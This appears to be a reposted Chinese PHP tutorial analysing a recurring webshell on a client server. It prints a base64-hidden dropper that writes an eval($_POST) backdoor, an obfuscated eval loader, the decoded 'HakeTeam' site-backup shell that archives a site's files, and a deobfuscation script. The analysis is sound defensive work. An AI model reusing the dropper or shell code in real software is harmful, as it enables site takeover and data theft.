当前位置:Gxlcms > PHP教程 > PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)

PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)

时间:2021-07-01 10:21:17 帮助过:29人阅读

这篇文章主要介绍了关于PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode),有着一定的参考价值,现在分享给大家,有需要的朋友可以参考一下

今天一个客户的服务器频繁被写入一句话后门,删除了还有,原来在程序中加入了如下代码,大家可以注意下base64_decode函数的参数。

今天一个客户的服务器频繁被写入:
mm.php
内容为:

代码如下:

<?eval($_POST[c]);?>

最后查到某文件内的第一行为以下代码:

代码如下:

fputs(fopen(base64_decode("bW0ucGhw"),"w"),base64_decode("PD9ldmFsKCRfUE9TVFtjXSk7Pz4=")); 
base64_decode("bW0ucGhw") //mm.php 
base64_decode("PD9ldmFsKCRfUE9TVFtjXSk7Pz4=") // 
<?eval($_POST[c]);?>

这样,只要这些文件被访问就会自动创建 mm.php
如果你发现了mm.php,删除了,以后还会再有的,真是越来越变态了~
下以相关内容

代码如下:

PD9ldmFs //base64_encode("<?eval"); 
ZXZhbA== //base64_encode("eval");

还发现一个ThinkPHP框架—sgcms的相密文件,内容以下:

代码如下:

<?php // Code By isosky www.nbst.org 
$OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=12308;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0='OOO0000O0';eval(($$O0O0000O0('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezEyfS4kT09PMDAwMDAwezE4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTl9O2lmKCEwKSRPMDAwTzBPMDA9JE9PME9PMDAwMCgkT09PME8wTzAwLCdyYicpOyRPTzBPTzAwME89JE9PTzAwMDAwMHsxN30uJE9PTzAwMDAwMHsyMH0uJE9PTzAwMDAwMHs1fS4kT09PMDAwMDAwezl9LiRPT08wMDAwMDB7MTZ9OyRPTzBPTzAwTzA9JE9PTzAwMDAwMHsxNH0uJE9PTzAwMDAwMHswfS4kT09PMDAwMDAwezIwfS4kT09PMDAwMDAwezB9LiRPT08wMDAwMDB7MjB9OyRPTzBPTzAwME8oJE8wMDBPME8wMCwxMTY1KTskT08wME8wME8wPSgkT09PMDAwME8wKCRPTzBPTzAwTzAoJE9PME9PMDAwTygkTzAwME8wTzAwLDM4MCksJ05TWGZZT0cvUXExeWF1ak00VzlFeDh0bEk3b0FIVmR3NWhEQ3oyQjBuc3ZQcFptS2diUjNKVUxlaytyNmNUaUY9JywnQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZhbCgkT08wME8wME8wKTs=')));return;?> 


解密后为:

代码如下:

<?php 
echo '<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"> 
<title>HakeTeam Website Backup V1.0 Beta - ';echo getenv('HTTP_HOST');;echo '</title> 
<style type="text/css"> 
body,p,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,code,form,fieldset,legend,input,textarea,p,blockquote,th,td{ 
margin:0;padding:0; 
} 
body { 
background:#EBEBED; 
color:#333; 
font-family:"Arial",Microsoft YaHei,Verdana,Helvetica,Arial,Sans-Serif; 
font-size:14px; 
} 
.textfield,textarea { 
border:1px solid green; 
font-size:14px; 
padding:2px; 
} 
.textfield:focus,textarea:focus { 
border-color:#F1CA7E; 
} 
.button { 
font-size:14px; 
text-decoration:none; 
margin-top:5px; 
background:#F5F5F5; 
border:1px solid green; 
color:#000; 
padding:2px 5px; 
} 
.button:hover { 
text-decoration:none; 
background:#EEE; 
border:1px solid #F1CA7E; 
color:#000; 
} 
pre { 
border:1px #ccc solid; 
line-height:18px; 
overflow:auto; 
word-wrap:break-word; 
max-height:220px; 
margin:4px; 
padding:4px 8px; 
} 
</style> 
</head> 
<form action="" method="post" name="postform"> 
<p align="left" class="searchbox"> 
'; 
ini_set('memory_limit','2048M'); 
echo "<pre> ---------------------------------------------- 
[<font color=#00BB00>*</font>]HakeTeam PHP Website Backup Shell V1.0 Beta 
[<font color=#00BB00>*</font>]Forum:http://www.hake.cc 
[<font color=#00BB00>*</font>]isosky's Blog:www.nbst.org 
---------------------------------------------- 
File List:</pre>"; 
$fdir = opendir('./'); 
while($file=readdir($fdir)) 
{ 
if($file=='.'||$file=='..') 
continue; 
echo "<input name='dfile[]' type='checkbox' value='$file' ".($file==basename(__FILE__)?'':'checked').'> '; 
if(is_file($file)) 
{ 
echo "<font face=\"wingdings\" size=\"5\">2</font>  $file<br>"; 
} 
else 
{ 
echo "<font face=\"wingdings\" size=\"5\">0</font> $file<br>"; 
} 
} 
;echo ' 
FileType: 
<input name="filetype" type="text" id="filetype" class="textfield" value="" size="50"> 
(Blank for all,use "|" to separate,e.g.:php|html|jpg) <br /> 
Backup Directory: 
<input name="todir" type="text" id="todir" class="textfield" value="iso_backup" size="41"> 
(Blank for this directory,use relative url,and you must be able to write file) 
<br> 
Backup Name: 
<input name="zipname" type="text" id="zipname" class="textfield" value="iso.zip" size="44"> 
(.zip type file) 
<br> 
<br> 
<input name="backup" type="hidden" id="backup" value="dozip"> 
<input type="submit" name="Submit" class="button" value="let\'s go!"> 
<p align="center"> 
<a href="http://nbst.org"><img src="http://nbst.org/logo.png" border="0"></a></p> 
<p> 
'; 
set_time_limit(0); 
class PHPzip 
{ 
var $file_count = 0 ; 
var $datastr_len = 0; 
var $dirstr_len = 0; 
var $filedata = ''; 
var $gzfilename; 
var $fp; 
var $dirstr=''; 
var $filefilters = array(); 
function SetFileFilter($filetype) 
{ 
$this->filefilters = explode('|',$filetype); 
} 
function unix2DosTime($unixtime = 0) 
{ 
$timearray = ($unixtime == 0) ?getdate() : getdate($unixtime); 
if ($timearray['year'] <1980) 
{ 
$timearray['year'] = 1980; 
$timearray['mon'] = 1; 
$timearray['mday'] = 1; 
$timearray['hours'] = 0; 
$timearray['minutes'] = 0; 
$timearray['seconds'] = 0; 
} 
return (($timearray['year'] -1980) <<25) |($timearray['mon'] <<21) |($timearray['mday'] <<16) |($timearray['hours'] <<11) |($timearray['minutes'] <<5) |($timearray['seconds'] >>1); 
} 
function startfile($path = 'dodo.zip') 
{ 
$this->gzfilename=$path; 
$mypathdir=array(); 
do 
{ 
$mypathdir[] = $path = dirname($path); 
}while($path != '.'); 
@end($mypathdir); 
do 
{ 
$path = @current($mypathdir); 
@mkdir($path); 
}while(@prev($mypathdir)); 
if($this->fp=@fopen($this->gzfilename,'w')) 
{ 
return true; 
} 
return false; 
} 
function addfile($data,$name) 
{ 
$name = str_replace('\\','/',$name); 
if(strrchr($name,'/')=='/') 
return $this->adddir($name); 
if(!empty($this->filefilters)) 
{ 
if (!in_array(end(explode('.',$name)),$this->filefilters)) 
{ 
return; 
} 
} 
$dtime = dechex($this->unix2DosTime()); 
$hexdtime = '\x'.$dtime[6] .$dtime[7] .'\x'.$dtime[4] .$dtime[5] .'\x'.$dtime[2] .$dtime[3] .'\x'.$dtime[0] .$dtime[1]; 
eval('$hexdtime = "'.$hexdtime .'";'); 
$unc_len = strlen($data); 
$crc = crc32($data); 
$zdata = gzcompress($data); 
$c_len = strlen($zdata); 
$zdata = substr(substr($zdata,0,strlen($zdata) -4),2); 
$datastr = "\x50\x4b\x03\x04"; 
$datastr .= "\x14\x00"; 
$datastr .= "\x00\x00"; 
$datastr .= "\x08\x00"; 
$datastr .= $hexdtime; 
$datastr .= pack('V',$crc); 
$datastr .= pack('V',$c_len); 
$datastr .= pack('V',$unc_len); 
$datastr .= pack('v',strlen($name)); 
$datastr .= pack('v',0); 
$datastr .= $name; 
$datastr .= $zdata; 
$datastr .= pack('V',$crc); 
$datastr .= pack('V',$c_len); 
$datastr .= pack('V',$unc_len); 
fwrite($this->fp,$datastr); 
$my_datastr_len = strlen($datastr); 
unset($datastr); 
$dirstr = "\x50\x4b\x01\x02"; 
$dirstr .= "\x00\x00"; 
$dirstr .= "\x14\x00"; 
$dirstr .= "\x00\x00"; 
$dirstr .= "\x08\x00"; 
$dirstr .= $hexdtime; 
$dirstr .= pack('V',$crc); 
$dirstr .= pack('V',$c_len); 
$dirstr .= pack('V',$unc_len); 
$dirstr .= pack('v',strlen($name) ); 
$dirstr .= pack('v',0 ); 
$dirstr .= pack('v',0 ); 
$dirstr .= pack('v',0 ); 
$dirstr .= pack('v',0 ); 
$dirstr .= pack('V',32 ); 
$dirstr .= pack('V',$this->datastr_len ); 
$dirstr .= $name; 
$this->dirstr .= $dirstr; 
$this ->file_count ++; 
$this ->dirstr_len += strlen($dirstr); 
$this ->datastr_len += $my_datastr_len; 
} 
function adddir($name) 
{ 
$name = str_replace("\\",'/',$name); 
$datastr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
$datastr .= pack('V',0).pack('V',0).pack('V',0).pack('v',strlen($name) ); 
$datastr .= pack('v',0 ).$name.pack('V',0).pack('V',0).pack('V',0); 
fwrite($this->fp,$datastr); 
$my_datastr_len = strlen($datastr); 
unset($datastr); 
$dirstr = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
$dirstr .= pack('V',0).pack('V',0).pack('V',0).pack('v',strlen($name) ); 
$dirstr .= pack('v',0 ).pack('v',0 ).pack('v',0 ).pack('v',0 ); 
$dirstr .= pack('V',16 ).pack('V',$this->datastr_len).$name; 
$this->dirstr .= $dirstr; 
$this ->file_count ++; 
$this ->dirstr_len += strlen($dirstr); 
$this ->datastr_len += $my_datastr_len; 
} 
function createfile() 
{ 
$endstr = "\x50\x4b\x05\x06\x00\x00\x00\x00". 
pack('v',$this ->file_count) . 
pack('v',$this ->file_count) . 
pack('V',$this ->dirstr_len) . 
pack('V',$this ->datastr_len) . 
"\x00\x00"; 
fwrite($this->fp,$this->dirstr.$endstr); 
fclose($this->fp); 
} 
} 
if(!trim($_REQUEST[zipname])) 
$_REQUEST[zipname] = 'dodozip.zip'; 
else 
$_REQUEST[zipname] = trim($_REQUEST[zipname]); 
if(!strrchr(strtolower($_REQUEST[zipname]),'.')=='.zip') 
$_REQUEST[zipname] .= '.zip'; 
$_REQUEST[todir] = str_replace('\\','/',trim($_REQUEST[todir])); 
if(!strrchr(strtolower($_REQUEST[todir]),'/')=='/') 
$_REQUEST[todir] .= '/'; 
if($_REQUEST[todir]=='/') 
$_REQUEST[todir] = './'; 
function listfiles($dir='.') 
{ 
global $dodozip; 
$sub_file_num = 0; 
if(is_file("$dir")) 
{ 
if(realpath($dodozip ->gzfilename)!=realpath("$dir")) 
{ 
$dodozip ->addfile(implode('',file("$dir")),"$dir"); 
return 1; 
} 
return 0; 
} 
$handle=opendir("$dir"); 
while ($file = readdir($handle)) 
{ 
if($file=='.'||$file=='..') 
continue; 
if(is_dir("$dir/$file")) 
{ 
$sub_file_num += listfiles("$dir/$file"); 
} 
else 
{ 
if(realpath($dodozip ->gzfilename)!=realpath("$dir/$file")) 
{ 
$dodozip ->addfile(implode('',file("$dir/$file")),"$dir/$file"); 
$sub_file_num ++; 
} 
} 
} 
closedir($handle); 
if(!$sub_file_num) 
$dodozip ->addfile('',"$dir/"); 
return $sub_file_num; 
} 
function num_bitunit($num) 
{ 
$bitunit=array(' B',' KB',' MB',' GB'); 
for($key=0;$key<count($bitunit);$key++) 
{ 
if($num>=pow(2,10*$key)-1) 
{ 
$num_bitunit_str=(ceil($num/pow(2,10*$key)*100)/100)." $bitunit[$key]"; 
} 
} 
return $num_bitunit_str; 
} 
if(is_array($_REQUEST[dfile])) 
{ 
$dodozip = new PHPzip; 
if($_REQUEST['filetype'] != NULL) 
$dodozip ->SetFileFilter($_REQUEST['filetype']); 
if($dodozip ->startfile("$_REQUEST[todir]$_REQUEST[zipname]")) 
{ 
echo 'Working,Please wait...<br><br>'; 
$filenum = 0; 
foreach($_REQUEST[dfile] as $file) 
{ 
if(is_file($file)) 
{ 
if(!empty($dodozip ->filefilters)) 
if (!in_array(end(explode('.',$file)),$dodozip ->filefilters)) 
continue; 
echo "<font face=\"wingdings\" size=\"5\">2</font>  $file<br>"; 
} 
else 
{ 
echo "<font face=\"wingdings\" size=\"5\">0</font> $file<br>"; 
} 
$filenum += listfiles($file); 
} 
$dodozip ->createfile(); 
echo "<br>success,For $filenum files.Url:<a href='$_REQUEST[todir]$_REQUEST[zipname]' _fcksavedurl='$_REQUEST[todir]$_REQUEST[zipname]'>$_REQUEST[todir]$_REQUEST[zipname] (".num_bitunit(filesize("$_REQUEST[todir]$_REQUEST[zipname]")).')</a>'; 
} 
else 
{ 
echo "$_REQUEST[todir]$_REQUEST[zipname] Error,Unable to write file.<br>"; 
} 
} 
;echo ' 
</form> 
</body> 
</html> 
';?>


这是一个用来打包成zip的php代码,这些鸟人为了黑别人的网站什么办法都用,真恶心~~
下如是一个高人写的ThinkPHP框架(sgcms)解密程序:

代码如下:

<?php 
// This file is protected by sgcms & provided under license. 
Copyright(C) 2007-2010 www.sgcms.cn, All rights reserved. 
$OOO0O0O00=__FILE__; 
$OOO000000=urldecode('th6sbehqla4co_sadfpnr'); 
$OO00O0000=21496; 
$OOO0000O0=$OOO000000{4}. 
$OOO000000{9}.$OOO000000{3}.$OOO000000{5}; 
$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16}; 
$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5}; 
$O0O0000O0='OOO0000O0'; 
eval(($$O0O0000O0('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwM...

很明显,是使用了某种PHP代码混淆工具混淆了下,Google网上搜了下,问题解决,给遇到同样问题的朋友一个方便。
解密php文件:

代码如下:

<?php 
$filename="GlobalAction.class.php";//要解密的文件 
$lines = file($filename);//0,1,2行 
//第一次base64解密 
$content=""; 
if(preg_match("/O0O0000O0\('.*'\)/",$lines[1],$y)) 
{ 
$content=str_replace("O0O0000O0('","",$y[0]); 
$content=str_replace("')","",$content); 
$content=base64_decode($content); 
} 
//第一次base64解密后的内容中查找密钥 
$decode_key=""; 
if(preg_match("/\),'.*',/",$content,$k)) 
{ 
$decode_key=str_replace("),'","",$k[0]); 
$decode_key=str_replace("',","",$decode_key); 
} 
//查找要截取字符串长度 
$str_length=""; 
if(preg_match("/,\d*\),/",$content,$k)) 
{ 
$str_length=str_replace("),","",$k[0]); 
$str_length=str_replace(",","",$str_length); 
} 
//截取文件加密后的密文 
$Secret=substr($lines[2],$str_length); 
//echo $Secret; 
//直接还原密文
输出 echo "<?php\n".base64_decode(strtr($Secret,$decode_key, 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')). "?>"; ?>

以上就是PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)的详细内容,更多请关注Gxl网其它相关文章!

人气教程排行